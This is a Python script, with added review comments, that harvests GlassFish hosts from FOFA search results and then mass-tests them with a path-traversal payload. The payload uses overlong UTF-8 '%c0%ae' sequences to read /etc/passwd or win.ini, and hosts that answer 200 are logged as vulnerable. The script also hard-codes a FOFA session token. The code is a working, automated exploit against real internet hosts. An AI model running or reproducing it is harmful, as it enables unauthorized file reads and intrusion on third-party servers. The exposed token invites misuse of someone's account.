python脚本 批量化poc编写

import requests,base64,time,sys
from lxml import etree

# fofa网址获取
# 例如:https://fofa.so/result?qbase64=------------------&page=3
def fofa_search(search_data,page):
    """Pull result links for a FOFA query and append them to ``ip.txt``.

    Fetches ``https://fofa.so/result`` for pages ``1..page`` with the query
    base64-encoded into ``qbase64``, extracts every ``href`` of an
    ``<a target="_blank">`` element, prints them and appends them (one per
    line) to ``ip.txt`` in the working directory.

    Args:
        search_data: the FOFA query expression, e.g. a ``"..." && port="..."`` string.
        page: number of result pages to walk (inclusive upper bound).

    Returns:
        None. Output goes to stdout and ``ip.txt``.

    Raises:
        Nothing per page: every exception inside the loop body is swallowed,
        so a failed page leaves no trace in ``ip.txt`` and no error message.
    """
    # Example query: search_data = '"glassfish" && port="4848" && country="CN"'
    headers = {
        # NOTE(review): a live FOFA session token is hard-coded in source.
        # Treat it as compromised (rotate it) and read it from an environment
        # variable or config file instead of committing it.
        'cookie': 'fofa_token=eyJhbGciOiJIUzUxMi11IsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6ODAwMDgsIm1pZCI6MTAwMDQ5NjY1LCJ1c2VybmFtZSI6IuWGsOezliIsImV4cCI6MTYyODgzMDQ1NH0.meHO7KkOGsMHeW0CsvDyjWU9_P7HXMXxQkM5SenST6Udh4KIfyd38WGHWJ4JPLPVc9QV3o4J9dZixiys2v9E9g'
    }
    for yeshu in range(1,page+1):
        # Author's note: the account tier only allows viewing a few pages.
        url = 'https://fofa.so/result?page=' + str(yeshu) + '&qbase64='
        # FOFA expects the query as URL-safe-enough standard base64 of the UTF-8 bytes.
        search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
        urls = url + search_data_bs
        # Per-page error isolation: one bad page must not abort the whole walk.
        try:
            print('正在提取第' + str(yeshu) + '')
            # No timeout is set, so a stalled connection blocks the script indefinitely.
            result = requests.get(urls, headers=headers).content
            # print(result.decode('utf-8'))
            # Parse the FOFA HTML with lxml.
            soup = etree.HTML(result)
            # Collect every href of <a target="_blank">; presumably these are the
            # result hosts, but the XPath is layout-dependent and may also match
            # unrelated outbound links — verify against the current page markup.
            ip_data = soup.xpath('//a[@target="_blank"]/@href')

            ipdata = '\n'.join(ip_data)
            print(ip_data)
            with open(r'ip.txt', 'a+') as f:
                f.write(ipdata + '\n')
                # Redundant: the `with` block already closes the file.
                f.close()
            # Small pause between pages.
            time.sleep(0.5)
        except Exception as e:
            # Silently swallowed: network errors, parse errors and an expired
            # token all look identical (no output for that page).
            pass

#payload检测
def check_vuln():
    """Probe each host in ``ip.txt`` for a path-traversal response and log hits.

    For every line in ``ip.txt`` two GET requests are issued, one with a
    Linux-style probe path and one with a Windows-style probe path, both
    built from overlong UTF-8 encodings of ``..`` (``%c0%ae``). A host is
    appended to ``vuln.txt`` when either request returns HTTP 200.

    Returns:
        None. Hits are appended to ``vuln.txt``; progress is printed to stdout.

    Notes:
        - The only success criterion is the status code; a host that answers
          200 to any path (catch-all page, WAF block page) is recorded as a
          hit, so the output is prone to false positives.
        - Each host is written without a trailing newline, so consecutive
          entries in ``vuln.txt`` run together on one line.
        - Defensive indicator: requests whose path contains ``%c0%ae``
          sequences under ``/theme/META-INF/`` are malformed (overlong) UTF-8
          and should be rejected or alerted on by the server or WAF.
    """
    payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

    # ip.txt is produced by fofa_search(); the file handle is never closed explicitly.
    for ip in open('ip.txt'):
        # Strip only the newline; other whitespace on the line is kept.
        ip=ip.replace('\n','')
        # presumably each line already carries a scheme (http:// or https://),
        # otherwise requests raises and the host is skipped silently below.
        windows_url=ip+payload_windows
        linux_url=ip+payload_linux

        try:
            # No timeout on either request; a hanging host stalls the whole run.
            vuln_code_l= requests.get(linux_url).status_code  # status code only, body is ignored
            vuln_code_w = requests.get(windows_url).status_code  # status code only, body is ignored
            print("check->"+ip)
            if vuln_code_l == 200 or vuln_code_w == 200:
                with open(r'vuln.txt','a+') as f:
                    # No '\n' appended: entries concatenate on a single line.
                    f.write(ip)
                    # Redundant: the `with` block already closes the file.
                    f.close()
            time.sleep(0.5)
        except Exception as e:
            # Connection errors, bad URLs and timeouts are all dropped without a message.
            pass

if __name__=="__main__":
    # CLI: argv[1] is the FOFA query expression, argv[2] the page count.
    # No argument validation: a missing argument raises IndexError and a
    # non-numeric page count raises ValueError at the int() conversion.
    search = sys.argv[1]
    page = sys.argv[2]
    fofa_search(search,int(page))
    # Runs against whatever ip.txt currently holds, including entries from earlier runs.
    check_vuln()

 
